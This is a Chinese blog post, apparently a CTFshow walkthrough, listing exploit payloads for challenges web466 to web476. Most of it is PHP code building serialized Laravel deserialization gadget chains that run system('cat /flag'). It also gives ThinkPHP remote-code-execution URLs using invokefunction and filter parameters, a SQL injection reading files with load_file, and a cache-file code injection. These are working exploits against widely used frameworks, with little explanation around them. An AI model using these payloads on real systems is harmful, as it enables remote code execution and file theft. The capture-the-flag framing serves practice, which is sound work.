当前位置:网站首页>CTFSHOW框架复现篇
CTFSHOW框架复现篇
2022-06-30 22:35:00 【yu22x】
web466
反序列化格式 /admin/序列化串base64
参考文章https://xz.aliyun.com/t/11002
payload
<?php
namespace Illuminate\Validation {
class Validator {
public $extensions = [];
public function __construct() {
$this->extensions = ['' => 'system'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Validation\Validator;
class PendingBroadcast {
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Validator();
$this->event = $cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>
web467
参考文章https://xz.aliyun.com/t/9478
<?php
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
namespace Illuminate\Events
{
class Dispatcher
{
protected $listeners;
public function __construct($event){
$this->listeners=[$event=>['system']];
}
}
}
web468
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
<?php
namespace Illuminate\Broadcasting
{
use Illuminate\Notifications\ChannelManager;
class PendingBroadcast
{
protected $events;
public function __construct($cmd)
{
$this->events = new ChannelManager($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
echo base64_encode(serialize($seri));
}
namespace Illuminate\Notifications
{
class ChannelManager
{
protected $app;
protected $defaultChannel;
protected $customCreators;
public function __construct($cmd)
{
$this->defaultChannel = 'yu22x';
$this->customCreators = array('yu22x' => 'system');
$this->app = $cmd;
}
}
}
?>
发送payload后看下源代码即可。
web469|web470
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
<?php
namespace Illuminate\Broadcasting
{
use Faker\ValidGenerator;
class PendingBroadcast
{
protected $events;
public function __construct($cmd)
{
$this->events = new ValidGenerator($cmd);
}
}
$seri = new PendingBroadcast('cat /flag');
echo base64_encode(serialize($seri));
}
namespace Faker
{
use Faker\DefaultGenerator;
class ValidGenerator
{
protected $maxRetries;
protected $validator;
protected $generator;
public function __construct($cmd)
{
$this->generator = new DefaultGenerator($cmd);
$this->maxRetries = 10000000;
$this->validator = 'system';
}
}
}
namespace Faker
{
class DefaultGenerator
{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
}
?>
web471
参考文章http://www.136.la/jingpin/show-180114.html#POC1_46
<?php
namespace Illuminate\Broadcasting
{
use Illuminate\Bus\Dispatcher;
use Illuminate\Foundation\Console\QueuedCommand;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct()
{
$this->events = new Dispatcher();
$this->event = new QueuedCommand();
}
}
}
namespace Illuminate\Foundation\Console
{
class QueuedCommand
{
public $connection = 'cat /flag';
}
}
namespace Illuminate\Bus
{
class Dispatcher
{
protected $queueResolver;
public function __construct()
{
$this->queueResolver='system';
}
}
}
namespace
{
use Illuminate\Broadcasting\PendingBroadcast;
echo base64_encode(serialize(new PendingBroadcast()));
}
web472
参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
payload
<?php
namespace Illuminate\Broadcasting{
use Illuminate\Contracts\Events\Dispatcher;
class PendingBroadcast
{
protected $event;
protected $events;
public function __construct($events, $event)
{
$this->event = $event;
$this->events = $events;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace{
$c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
$a = new Illuminate\Bus\Dispatcher('system');
$b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
echo base64_encode(serialize($b));
}
web473
参考文章https://www.cnblogs.com/litlife/p/11273652.html
试了几个报错函数 ,其中exp可用。
payloadindex.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1
web474
参考文章https://blog.csdn.net/rfrder/article/details/114599310
public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
接着访问
runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php
web475
s=cat /flag&_method=__construct&method=POST&filter[]=system
aaaa=cat /flag&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=cat /flag
c=cat /flag&f=calc&_method=filter
web476
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
边栏推荐
- Online customer service chat system source code_ Beautiful and powerful golang kernel development_ Binary operation fool installation_ Attached construction tutorial
- 2022-06-30:以下golang代码输出什么?A:0;B:2;C:运行错误。 package main import “fmt“ func main() { ints := make
- Neo4j load CSV configuration and use
- What does the &?
- Ten of the most heart piercing tests / programmer jokes, read the vast crowd, how to find?
- Ideal interface automation project
- msf之ms17-010永恒之蓝漏洞
- 基于kubernetes平台微服务的部署
- leetcode:104. 二叉树的最大深度
- 有孚网络混合云,加速企业数字化转型升级
猜你喜欢
![[Android, kotlin, tflite] mobile device integration deep learning light model tflite (object detection)](/img/7e/3e6ebfb90a82249d934296a041ba21.png)
[Android, kotlin, tflite] mobile device integration deep learning light model tflite (object detection)

Golang application ━ installation, configuration and use of Hugo blog system

Ten of the most heart piercing tests / programmer jokes, read the vast crowd, how to find?

Fastjson V2 简单使用手册
![Flip the linked list ii[three ways to flip the linked list +dummyhead/ head insertion / tail insertion]](/img/a8/6472e2051a295f5e42a88d64199517.png)
Flip the linked list ii[three ways to flip the linked list +dummyhead/ head insertion / tail insertion]

Spark - understand partitioner in one article

Cas classique multithreadé

项目管理到底管的是什么?

Is it difficult to get a certified equipment supervisor? What is the relationship with the supervising engineer?

十个最为戳心测试/开程序员笑话,念茫茫人海,该如何寻觅?
随机推荐
Is it difficult to get a certified equipment supervisor? What is the relationship with the supervising engineer?
后疫情时代,云计算如何为在线教育保驾护航
Esp8266 becomes client and server
latex字母头顶两个点
【Android,Kotlin,TFLite】移动设备集成深度学习轻模型TFlite(图像分类篇)
项目管理到底管的是什么?
[无线通信基础-13]:图解移动通信技术与应用发展-1-概述
AtCoder Beginner Contest 257
Smart streetlights | cloud computing lights up the "spark" of smart cities
Flip the linked list ii[three ways to flip the linked list +dummyhead/ head insertion / tail insertion]
Redis - 01 缓存:如何利用读缓存提高系统性能?
How to use filters in jfinal to monitor Druid for SQL execution?
多線程經典案例
2022-06-30:以下golang代码输出什么?A:0;B:2;C:运行错误。 package main import “fmt“ func main() { ints := make
Femas: cloud native multi runtime microservice framework
软件测试报告包含哪些内容?如何获取高质量软件测试报告?
Web APIs comprehensive case -tab column switching - dark horse programmer
Analysis of PostgreSQL storage structure
Introduction to machine learning compilation course learning notes lesson 2 tensor program abstraction
「团队训练赛」ShanDong Multi-University Training #3